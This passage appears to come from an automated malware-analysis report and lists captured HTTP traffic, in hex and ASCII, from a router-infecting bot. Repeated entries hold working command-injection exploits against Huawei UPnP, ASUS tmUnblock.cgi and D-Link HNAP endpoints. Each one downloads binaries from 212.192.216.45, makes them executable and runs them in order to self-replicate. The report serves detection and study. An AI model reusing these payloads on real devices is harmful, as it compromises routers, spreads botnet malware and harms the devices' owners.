3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 